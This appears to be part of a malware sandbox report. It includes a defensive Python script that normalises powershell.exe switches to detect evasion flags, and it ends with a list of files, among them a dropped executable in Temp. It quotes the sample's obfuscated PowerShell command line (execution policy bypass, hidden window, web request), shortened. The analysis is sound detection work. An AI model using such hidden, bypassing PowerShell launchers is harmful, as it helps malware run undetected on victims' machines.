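powershell.exe resolves its host switches by case-insensitive prefix, which is why -ex BYPAsS, -noNI and -W HiddEn work exactly like -ExecutionPolicy Bypass -NonInteractive -WindowStyle Hidden, and why a detection that looks for those literal spellings misses this sample. The Python below is an added example, not part of this report or of the sample, that canonicalises the switches before testing them. The switch table is an assumption: its shortest accepted prefixes and the -ep and -ec aliases are my reading of the Windows PowerShell console host's parameter parser, and the table is not exhaustive. The command line is the one from this report with the script body shortened.

```python
# Switch table for powershell.exe: canonical name, the spelling the host compares against,
# the shortest prefix it accepts, and whether a value follows. Assumption: the prefixes and
# aliases are my reading of the Windows PowerShell console host's parser, not from this report.
SWITCHES = [
    ("ExecutionPolicy", "executionpolicy", "ex", True),
    ("ExecutionPolicy", "ep", "ep", True),
    ("EncodedCommand", "encodedcommand", "e", True),
    ("EncodedCommand", "ec", "ec", True),
    ("NonInteractive", "noninteractive", "noni", False),
    ("NoProfile", "noprofile", "nop", False),
    ("NoLogo", "nologo", "nol", False),
    ("NoExit", "noexit", "noe", False),
    ("WindowStyle", "windowstyle", "w", True),
    ("Command", "command", "c", True),
    ("File", "file", "f", True),
    ("Version", "version", "v", True),
    ("Sta", "sta", "s", False),
    ("Mta", "mta", "mta", False),
]

# Constructed sample: the switches from this report's command line, script body shortened.
SAMPLE_CMDLINE = ("C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -ex BYPAsS -noNI -W HiddEn "
                  "$EFGiZIWe = [NET.WebrEQuest]::CreaTe( ... )")

HOST_NAMES = ("powershell.exe", "powershell", "pwsh.exe", "pwsh")


def canonical_switch(token):
    """Map one "-ex" / "/Ex" / "-EXECUTIONPOLICY" token to (canonical name, takes_value)."""
    key = token.lstrip("-/").lower()
    for canonical, spelling, shortest, takes_value in SWITCHES:
        if len(key) >= len(shortest) and spelling.startswith(key):
            return canonical, takes_value
    return None, False


def parse_host_args(cmdline):
    """Canonicalise the leading host switches; whatever follows them (or -Command) is the script."""
    tokens = cmdline.split()
    if tokens and tokens[0].strip('"').lower().endswith(HOST_NAMES):
        tokens = tokens[1:]
    args, i = {}, 0
    while i < len(tokens) and tokens[i][:1] in ("-", "/"):
        name, takes_value = canonical_switch(tokens[i])
        if name is None:                       # unknown switch: stop, treat the rest as script
            break
        if name == "Command":                  # -Command swallows the remainder of the line
            args[name] = " ".join(tokens[i + 1:])
            return args
        if takes_value:
            args[name] = tokens[i + 1] if i + 1 < len(tokens) else ""
            i += 2
        else:
            args[name] = True
            i += 1
    args["Script"] = " ".join(tokens[i:])
    return args


def evasion_indicators(cmdline):
    """Policy/visibility/encoding indicators, judged on canonical names and case-folded values."""
    args = parse_host_args(cmdline)
    hits = []
    if str(args.get("ExecutionPolicy", "")).lower() in ("bypass", "unrestricted"):
        hits.append("execution policy bypass")
    if str(args.get("WindowStyle", "")).lower() == "hidden":
        hits.append("hidden window")
    if args.get("NonInteractive"):
        hits.append("non-interactive")
    if "EncodedCommand" in args:
        hits.append("encoded command")
    return hits


if __name__ == "__main__":
    print(parse_host_args(SAMPLE_CMDLINE))
    print(evasion_indicators(SAMPLE_CMDLINE))
```

Normalising first and matching second is the point: the same three indicators fire for -ex BYPAsS -noNI -W HiddEn, for -ep bypass -noninteractive -w hidden and for /ExecutionPolicy Unrestricted, which is what a rule keyed on one literal spelling cannot do.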
file C:\Windows\System32\ie4uinit.exe
file C:\Program Files\Windows Sidebar\sidebar.exe
file C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file C:\Windows\System32\xpsrchvw.exe
file C:\Windows\System32\displayswitch.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file C:\Windows\System32\mblctr.exe
file C:\Windows\System32\mstsc.exe
file C:\Windows\System32\SnippingTool.exe
file C:\Windows\System32\SoundRecorder.exe
file C:\Windows\System32\dfrgui.exe
file C:\Windows\System32\msinfo32.exe
file C:\Windows\System32\rstrui.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file C:\Program Files\Windows Journal\Journal.exe
file C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file C:\Windows\System32\MdSched.exe
file C:\Windows\System32\msconfig.exe
file C:\Windows\System32\recdisc.exe
file C:\Windows\System32\msra.exe
file C:\Users\test22\AppData\Local\Temp\avicapn32.exe